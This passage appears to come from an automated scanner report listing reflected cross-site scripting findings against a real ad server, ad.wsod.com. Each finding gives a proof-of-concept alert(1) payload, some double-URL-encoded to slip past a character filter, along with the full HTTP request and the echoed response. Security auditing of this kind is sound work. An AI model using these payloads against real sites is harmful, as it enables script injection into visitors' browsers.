+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830130**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=c9bdd</script><script>alert(1)</script>98903d590b7&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFs
...[SNIP]...

1.133. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abcce</script><script>alert(1)</script>725f9991d9b was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,abcce</script><script>alert(1)</script>725f9991d9b&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830211**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,abcce</script><script>alert(1)</script>725f9991d9b&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/
...[SNIP]...

1.134. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fce6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6705cfb4e0 was submitted in the REST URL parameter 2. This input was echoed as 1fce6"><script>alert(1)</script>b6705cfb4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313571fce6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6705cfb4e0/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313571fce6"><script>alert(1)</script>b6705cfb4e0/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 739ff%2522%253balert%25281%2529%252f%252f281133da14 was submitted in the REST URL parameter 2. This input was echoed as 739ff";alert(1)//281133da14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357739ff%2522%253balert%25281%2529%252f%252f281133da14/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2658

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357739ff";alert(1)//281133da14/477.0.iframe.150x30/1300830282**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14
...[SNIP]...

1.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3440%2522%253balert%25281%2529%252f%252f23397f4688a was submitted in the REST URL parameter 3. This input was echoed as e3440";alert(1)//23397f4688a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30e3440%2522%253balert%25281%2529%252f%252f23397f4688a/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30e3440";alert(1)//23397f4688a/1300830310**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin
...[SNIP]...

1.137. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77dbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4410d9a1d was submitted in the REST URL parameter 3. This input was echoed as 77dbf"><script>alert(1)</script>4410d9a1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x3077dbf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4410d9a1d/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2700

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x3077dbf"><script>alert(1)</script>4410d9a1d/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.138. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f05"-alert(1)-"b4013011ca was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*b0f05"-alert(1)-"b4013011ca HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2631

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*b0f05"-alert(1)-"b4013011ca">
...[SNIP]...

1.139. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e39"><script>alert(1)</script>1ef8e8bc06e was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*52e39"><script>alert(1)</script>1ef8e8bc06e HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2663

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*52e39"><script>alert(1)</script>1ef8e8bc06ehttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.140. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 148c5"-alert(1)-"81be9749a7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&148c5"-alert(1)-"81be9749a7c=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2639

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
9/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&148c5"-alert(1)-"81be9749a7c=1">
...[SNIP]...

1.141. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eee0"><script>alert(1)</script>6e2d4d7b31a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/*&9eee0"><script>alert(1)</script>6e2d4d7b31a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2669

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
